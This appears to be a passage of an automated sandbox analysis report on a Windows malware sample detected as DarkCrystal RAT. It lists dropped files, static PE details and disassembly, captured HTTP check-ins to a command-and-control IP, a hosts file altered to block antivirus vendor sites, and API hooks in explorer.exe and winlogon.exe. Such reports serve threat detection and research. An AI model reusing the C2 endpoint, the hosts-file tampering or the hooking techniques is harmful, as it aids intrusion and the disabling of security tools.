                                                      Entropy (8bit):5.8140695358491365
                                                      Encrypted:false
                                                      SSDEEP:6:b3aOblTT6pS5r7+dUExanl5SfPV4WD2ES5JVgOMT16wslU5XlXJ:TaiJHGPxanlYwgOw6M5v
                                                      MD5:52111B51DEC339C6A76B6C866EEC54ED
                                                      SHA1:37A6D21D02CB10DDEB0D8EECF0CDB7B412263BE8
                                                      SHA-256:3CC1B3F788ABA7C13DEB30F164133F585498EC50AE18A26AF48AEC0182ADA352
                                                      SHA-512:4FB2ACDBD8B827B010FB9FCF330DE19823AF7F3CC6B374FEE08DE4F3A0D72518CE91F77EEB1B0E27291C75340E1880E377ED1A95D5A1EAE6EF9490460F635E63
                                                      Malicious:false
                                                      Preview:TsAPDlRCH829PBrCIyyjxftvXtlqsbi9TUILncPCgeA5CICUTxSw15gx9O1UAkUqZ3p43fYqjwDTextPqQX4JwHXyVMZk4C5KUfJcIbyZlNF2NTLfmotNZgnvSGiT8FotHJJRjwhzifhjCfkCA48QTsvx2XKC3fbgjVuEJ450G3o39EtxffSDHXaZXVZLme6DDAAqug2G8HKZD1yxoWhXMXZL5UqxeuOl7lz8ECC8nLF9NAWghlgP7i0qlyuazFlO3iccB0tlTiuASZ848JP3N8oYuJWQRmIhj1Goi3fr156YyzYMz0cqzsA44Ds2ddTqZMbbSUWEoiBSB

                                                      C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe

                                                      Download File
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1968128
                                                      Entropy (8bit):7.554175262094728
                                                      Encrypted:false
                                                      SSDEEP:24576:wR5wlxvspUb0qtT2YSCeBJxs56NAFUhOcfMxHoktN/c61+bURfTj/PlzBCpEwxl5:wUPKCeJxkBceok7WURfTj/j9wDmm
                                                      MD5:3997D7D058AF3C1B6C9ABB57F6FA1F2A
                                                      SHA1:CD38C3EB67E2D09445EB39B66A69B31673C2360C
                                                      SHA-256:B19C5E3261D05C95756D6452048448C4AB30D3179F90CA714DE39ECE0CD72D99
                                                      SHA-512:AD53432C8F8309701E0DC2BA7C885F5088EE69C3073E9D1DE4A3C75CB3C1AF845B43D0A8512AF58BCD425A831EC4F4BCF74FE3918956527DB5A96A88FC003A36
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                      • Antivirus: Virustotal, Detection: 74%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ... ....@.. .......................`............@.....................................K.... ..p....................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc...p.... ......................@....reloc.......@......................@..B........................H...........<.......s......p@..I........................................0..........(.... ........8........E....N...*...).......8I...(.... ....~u...{|...:....& ....8....*(.... ....~u...{....:....& ....8....(.... ....8........0.......... ........8........E............S...........8)...~....:.... ....~u...{....9....& ....8.......... ....~u...{....:....& ....8....~....(H... .... .... ....s....~....(L....... ....8^...r...ps....z*....~....(P...~....(T... ....?.... ....8&.....(....*

                                                      C:\Windows\RemotePackages\RemoteDesktops\e3a74901549792

                                                      Download File
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):141
                                                      Entropy (8bit):5.61179703406828
                                                      Encrypted:false
                                                      SSDEEP:3:5YW5uzdNgRxPGid1bOFWqPTxxKIcYLitBMtG+B6dr7zXsSrl3fSs:5YWwgXPGivbOF/lxKOvBB67zcYlvSs
                                                      MD5:5622E54B9BD142AC3E2AE55196C4AB89
                                                      SHA1:74D044F079CFD00840F92F61436916B5B53F97C8
                                                      SHA-256:03C12437E85E88EED0820FA7636842EC900FEA8D1D576CE8703F7C6D24F4CE4B
                                                      SHA-512:C70F2F00D9CF129E4DD6521EF229AC2B575AD25AF89781206FB68BFE488E40AE84764FB643431C959DD63606587E441359EBA7C8F047D4BCB878E24AA87C3C9B
                                                      Malicious:false
                                                      Preview:D54KwNs2UYKBYG8YpXqIR0tBz3KXSjegQTjcuYvrM8zZ4fETGf7ONZ1NL3V2DUjv4ouFhgnRm95SBUGUy1RxlPS1cVQ1D2o2YDfQu9wj2qlNdiM1xADMDwJoV2mLPwNuUD37y0kzEr45n

                                                      C:\Windows\System32\drivers\etc\hosts

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\GargantuanS.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1132
                                                      Entropy (8bit):4.645108565915121
                                                      Encrypted:false
                                                      SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTtozIRdG:vDZhyoZWM9rU5fFc9OM
                                                      MD5:4B81122BEC5C7F1650C47159338C9BA3
                                                      SHA1:EA50B1416C0288E27CA41390D7A2DD85D099DD50
                                                      SHA-256:D919FD0377FBCB23402D089C48BA3132B6115F7E1E57E0588ABFBAF1562A170D
                                                      SHA-512:EC5DB50EA5F510DB22A87B7FC768AEB5E36389E5C7F74DA91207BEDFE940EB9FEC506907BF51A5800EA94B4F2B37513298F57F598EEFD7504DFE4C1C54A5CB14
                                                      Malicious:true
                                                      Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 www.360totalsecurity.com..0.0.0.0 www.ccleaner.com..0.0.0.0 malwarebytes.sooftware.com..0.0.0.0 www.malwarebytes.com..0.0.0.0 www.micros

                                                      \Device\Null

                                                      Download File
                                                      Process:C:\Windows\System32\PING.EXE
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):502
                                                      Entropy (8bit):4.630609828667227
                                                      Encrypted:false
                                                      SSDEEP:12:P9l5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:VfdUOAokItULVDv
                                                      MD5:01E42C7D0BFC330C8CB8F87BD1F25257
                                                      SHA1:EAD7E45750E84C22F8BB01AF7D3BF6CB81401F8F
                                                      SHA-256:A634384A405C46CD9DB3F596A3F5A032AC51B1B7634BC8FFB9D016CDBCF74CD4
                                                      SHA-512:61F024BC83B791B9A7396F4BF85F38E77E07ADFD7ECC07EE799E8A070533064FC5FB552DDFD41A3DF07E92D41D37585EA962FEF98DAB9CBD1CC4C84812CAC64A
                                                      Malicious:false
                                                      Preview:..Pinging 965543 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                      Static File Info

                                                      General

                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Entropy (8bit):7.917799688345123
                                                      TrID:
                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                      • DOS Executable Generic (2002/1) 0.92%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe
                                                      File size:6'701'051 bytes
                                                      MD5:6acbb1fb58dccd74db667187b22de689
                                                      SHA1:cf0df5b247b15157cfce47473d1b063705d10b44
                                                      SHA256:c792057cb761da8872421a6c906c4481b260bdb5d27b86378efdd2af39319687
                                                      SHA512:b195df77aece1c054493a8fa195b9cffbfb9b2fe5c446ce59aa16fcc7ca0d19ca1ae25d7de4aa9fde59cdcd554293057a1d6806c0734d3d9e62671088d5a66a6
                                                      SSDEEP:196608:5EnAjdZqS8NA40yYnSTq0GnUZhUjGtpoHtx:DbHB40yYSTq+Rix
                                                      TLSH:2D662256E2980CE5E87293BC8963CD79A2737E982A71C68E12F47C37BF732D15C25241
                                                      File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........B#..,p..,p..,p.:.p..,p.:.p5.,p.:.p..,p<..p..,p<.(q..,p<./q..,p<.)q..,p...p..,p...p..,p...p..,p..-p..,p2.)q..,p2.,q..,p2..p..,

                                                      File Icon

                                                      Icon Hash:0f07132b6d35171c

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x140026670
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x140000000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x65BA8FE6 [Wed Jan 31 18:22:30 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:2
                                                      File Version Major:5
                                                      File Version Minor:2
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:2
                                                      Import Hash:e8a30656287fe831c9782204ed10cd68

                                                      Entrypoint Preview

                                                      Instruction
                                                      dec eax
                                                      sub esp, 28h
                                                      call 00007FA13556DFF8h
                                                      dec eax
                                                      add esp, 28h
                                                      jmp 00007FA13556D98Fh
                                                      int3
                                                      int3
                                                      dec eax
                                                      mov eax, esp
                                                      dec eax
                                                      mov dword ptr [eax+08h], ebx
                                                      dec eax
                                                      mov dword ptr [eax+10h], ebp
                                                      dec eax
                                                      mov dword ptr [eax+18h], esi
                                                      dec eax
                                                      mov dword ptr [eax+20h], edi
                                                      inc ecx
                                                      push esi
                                                      dec eax
                                                      sub esp, 20h
                                                      dec ebp
                                                      mov edx, dword ptr [ecx+38h]
                                                      dec eax
                                                      mov esi, edx
                                                      dec ebp
                                                      mov esi, eax
                                                      dec eax
                                                      mov ebp, ecx
                                                      dec ecx
                                                      mov edx, ecx
                                                      dec eax
                                                      mov ecx, esi
                                                      dec ecx
                                                      mov edi, ecx
                                                      inc ecx
                                                      mov ebx, dword ptr [edx]
                                                      dec eax
                                                      shl ebx, 04h
                                                      dec ecx
                                                      add ebx, edx
                                                      dec esp
                                                      lea eax, dword ptr [ebx+04h]
                                                      call 00007FA13556CF53h
                                                      mov eax, dword ptr [ebp+04h]
                                                      and al, 66h
                                                      neg al
                                                      mov eax, 00000001h
                                                      sbb edx, edx
                                                      neg edx
                                                      add edx, eax
                                                      test dword ptr [ebx+04h], edx
                                                      je 00007FA13556DB23h
                                                      dec esp
                                                      mov ecx, edi
                                                      dec ebp
                                                      mov eax, esi
                                                      dec eax
                                                      mov edx, esi
                                                      dec eax
                                                      mov ecx, ebp
                                                      call 00007FA13556F7E3h
                                                      dec eax
                                                      mov ebx, dword ptr [esp+30h]
                                                      dec eax
                                                      mov ebp, dword ptr [esp+38h]
                                                      dec eax
                                                      mov esi, dword ptr [esp+40h]
                                                      dec eax
                                                      mov edi, dword ptr [esp+48h]
                                                      dec eax
                                                      add esp, 20h
                                                      inc ecx
                                                      pop esi
                                                      ret
                                                      int3
                                                      int3
                                                      int3
                                                      dec eax
                                                      sub esp, 48h
                                                      dec eax
                                                      lea ecx, dword ptr [esp+20h]
                                                      call 00007FA13556CA23h
                                                      dec eax
                                                      lea edx, dword ptr [00023BA7h]
                                                      dec eax
                                                      lea ecx, dword ptr [esp+20h]
                                                      call 00007FA13556EBF2h
                                                      int3
                                                      jmp 00007FA1355749C0h
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3

                                                      Rich Headers

                                                      Programming Language:
                                                      • [ C ] VS2008 SP1 build 30729
                                                      • [IMP] VS2008 SP1 build 30729

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x4b1e00x34.rdata
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x4b2140x50.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x710000x4ffab.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x6c0000x2ab4.pdata
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xc10000x938.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x460e00x54.rdata
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x461800x28.rdata
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3de100x140.rdata
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x3b0000x4a0.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x4a4ac0x100.rdata
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x3988e0x39a00b1e4251172e7243c7614dd9f08de8681False0.5453540197939263data6.464508992537505IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x3b0000x1118c0x1120031179600be0d23b2c74edff345900540False0.44718008667883213data5.216220468557472IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0x4d0000x1ef5c0x1a00148867e92396c2a403730872d91149f7False0.2765925480769231DOS executable (block device driver o\3050)3.1779391259225855IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .pdata0x6c0000x2ab40x2c004914dd9fef7c92b1e7e7f57098d6f308False0.4796697443181818data5.3938448326175585IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .didat0x6f0000x3080x400f83dedcddf9ceb5084b7159064aebc44False0.23828125data2.796337056872422IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      _RDATA0x700000x15c0x2004a3322e97146b4fbd4ed6f2bbc580541False0.408203125data3.318036041719511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .rsrc0x710000x4ffab0x50000025501bc3f5d0b1f870144ea838068cbFalse0.230029296875data3.927578152389179IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0xc10000x9380xa00c057cd0b29d094da3cebf433be170d6dFalse0.498828125data5.228587706357198IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      PNG0x716e00xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                      PNG0x722280x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                      RT_ICON0x737d40x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                      RT_ICON0x73d3c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                      RT_ICON0x745e40xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                      RT_ICON0x7548c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                      RT_ICON0x758f40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                      RT_ICON0x7699c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                      RT_ICON0x78f440x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                      RT_ICON0x7ccb80x41c08Device independent bitmap graphic, 256 x 510 x 32, image size 261120, resolution 5905 x 5905 px/m0.14287836031486706
                                                      RT_DIALOG0xbe8c00x286dataEnglishUnited States0.5092879256965944
                                                      RT_DIALOG0xbeb480x13adataEnglishUnited States0.60828025477707
                                                      RT_DIALOG0xbec840xecdataEnglishUnited States0.6991525423728814
                                                      RT_DIALOG0xbed700x12edataEnglishUnited States0.5927152317880795
                                                      RT_DIALOG0xbeea00x338dataEnglishUnited States0.45145631067961167
                                                      RT_DIALOG0xbf1d80x252dataEnglishUnited States0.5757575757575758
                                                      RT_STRING0xbf42c0x1e2dataEnglishUnited States0.3900414937759336
                                                      RT_STRING0xbf6100x1ccdataEnglishUnited States0.4282608695652174
                                                      RT_STRING0xbf7dc0x1b8dataEnglishUnited States0.45681818181818185
                                                      RT_STRING0xbf9940x146dataEnglishUnited States0.5153374233128835
                                                      RT_STRING0xbfadc0x46cdataEnglishUnited States0.3454063604240283
                                                      RT_STRING0xbff480x166dataEnglishUnited States0.49162011173184356
                                                      RT_STRING0xc00b00x152dataEnglishUnited States0.5059171597633136
                                                      RT_STRING0xc02040x10adataEnglishUnited States0.49624060150375937
                                                      RT_STRING0xc03100xbcdataEnglishUnited States0.6329787234042553
                                                      RT_STRING0xc03cc0x1c0dataEnglishUnited States0.5178571428571429
                                                      RT_STRING0xc058c0x250dataEnglishUnited States0.44256756756756754
                                                      RT_GROUP_ICON0xc07dc0x14data1.25
                                                      RT_GROUP_ICON0xc07f00x68dataEnglishUnited States0.7019230769230769
                                                      RT_MANIFEST0xc08580x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                      Imports

                                                      DLLImport
                                                      KERNEL32.dllLocalFree, GetLastError, SetLastError, FormatMessageW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileTime, CloseHandle, CreateFileW, GetCurrentProcessId, CreateDirectoryW, RemoveDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, MoveFileW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetCurrentProcess, GetExitCodeProcess, WaitForSingleObject, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapReAlloc, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, SetEvent, ResetEvent, WaitForSingleObjectEx, CreateEventW, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP
                                                      OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                      gdiplus.dllGdipCloneImage, GdipAlloc, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishUnited States

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      04/25/24-10:32:09.038045TCP2048095ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)4973080192.168.2.4176.123.168.151

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Apr 25, 2024 10:32:08.796350002 CEST4973080192.168.2.4176.123.168.151
                                                      Apr 25, 2024 10:32:09.037261963 CEST8049730176.123.168.151192.168.2.4
                                                      Apr 25, 2024 10:32:09.037359953 CEST4973080192.168.2.4176.123.168.151
                                                      Apr 25, 2024 10:32:09.038044930 CEST4973080192.168.2.4176.123.168.151
                                                      Apr 25, 2024 10:32:09.278606892 CEST8049730176.123.168.151192.168.2.4
                                                      Apr 25, 2024 10:32:09.279153109 CEST8049730176.123.168.151192.168.2.4
                                                      Apr 25, 2024 10:32:09.279195070 CEST8049730176.123.168.151192.168.2.4
                                                      Apr 25, 2024 10:32:09.279289007 CEST4973080192.168.2.4176.123.168.151
                                                      Apr 25, 2024 10:32:09.457537889 CEST4973080192.168.2.4176.123.168.151
                                                      Apr 25, 2024 10:32:09.740430117 CEST8049730176.123.168.151192.168.2.4
                                                      Apr 25, 2024 10:33:54.951847076 CEST4973080192.168.2.4176.123.168.151
                                                      Apr 25, 2024 10:33:55.193032980 CEST8049730176.123.168.151192.168.2.4
                                                      Apr 25, 2024 10:33:55.193244934 CEST4973080192.168.2.4176.123.168.151
                                                      Apr 25, 2024 10:34:04.608644009 CEST49738443192.168.2.4176.123.168.151
                                                      Apr 25, 2024 10:34:04.608685017 CEST44349738176.123.168.151192.168.2.4
                                                      Apr 25, 2024 10:34:04.608769894 CEST49738443192.168.2.4176.123.168.151
                                                      Apr 25, 2024 10:34:04.628528118 CEST49738443192.168.2.4176.123.168.151
                                                      Apr 25, 2024 10:34:04.628551960 CEST44349738176.123.168.151192.168.2.4
                                                      Apr 25, 2024 10:34:05.121049881 CEST44349738176.123.168.151192.168.2.4
                                                      Apr 25, 2024 10:34:05.121325016 CEST49738443192.168.2.4176.123.168.151
                                                      Apr 25, 2024 10:34:05.126394987 CEST49738443192.168.2.4176.123.168.151
                                                      Apr 25, 2024 10:34:05.126413107 CEST44349738176.123.168.151192.168.2.4
                                                      Apr 25, 2024 10:34:05.126657963 CEST44349738176.123.168.151192.168.2.4
                                                      Apr 25, 2024 10:34:05.159436941 CEST49738443192.168.2.4176.123.168.151
                                                      Apr 25, 2024 10:34:05.159495115 CEST44349738176.123.168.151192.168.2.4
                                                      Apr 25, 2024 10:34:05.159593105 CEST49738443192.168.2.4176.123.168.151

                                                      HTTP Request Dependency Graph

                                                      • 176.123.168.151

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449730176.123.168.151808116C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe
                                                      TimestampBytes transferredDirectionData
                                                      Apr 25, 2024 10:32:09.038044930 CEST401OUTPOST /4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows/cpuvoiddbtraffic/2Base/ProviderExternalpipeJavascriptupdateSqldbasyncTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 176.123.168.151
                                                      Content-Length: 344
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Apr 25, 2024 10:32:09.279153109 CEST25INHTTP/1.1 100 Continue
                                                      Apr 25, 2024 10:32:09.279195070 CEST347INHTTP/1.1 301 Moved Permanently
                                                      Location: https://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows/cpuvoiddbtraffic/2Base/ProviderExternalpipeJavascriptupdateSqldbasyncTemporary.php
                                                      Date: Thu, 25 Apr 2024 08:32:09 GMT
                                                      Connection: keep-alive
                                                      Keep-Alive: timeout=5
                                                      Transfer-Encoding: chunked
                                                      Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0
                                                      Apr 25, 2024 10:32:09.457537889 CEST344OUTData Raw: 00 03 04 07 03 0f 01 02 05 06 02 01 02 07 01 06 00 03 05 0b 02 01 03 01 00 52 0a 02 04 04 01 52 0d 54 07 0a 01 07 04 04 0e 51 07 00 00 07 05 05 03 03 0c 5b 0e 00 06 0a 05 01 05 0c 06 56 05 0f 00 0a 0d 5b 05 01 06 02 0d 06 0e 50 0d 04 0c 05 05 51
                                                      Data Ascii: RRTQ[V[PQU]\L}Shcvvrj\vl@|BbYwhkcw_oo`Yo`PDhmtcgpi_~V@A{mvL~b[


                                                      Code Manipulations

                                                      User Modules

                                                      Hook Summary

                                                      Function NameHook TypeActive in Processes
                                                      ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                      NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                      ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                                      NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                      ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                      NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                      NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                      ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                      ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                      NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                                      RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                                      NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                      NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                      ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                      ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe

                                                      Processes

                                                      Process: explorer.exe, Module: ntdll.dll
                                                      Function NameHook TypeNew Data
                                                      ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                      NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                      NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                      ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                      NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                      NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                      ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                      ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                      RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                      NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                      ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                      ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                      Process: winlogon.exe, Module: ntdll.dll
                                                      Function NameHook TypeNew Data
                                                      ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                      NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                      NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
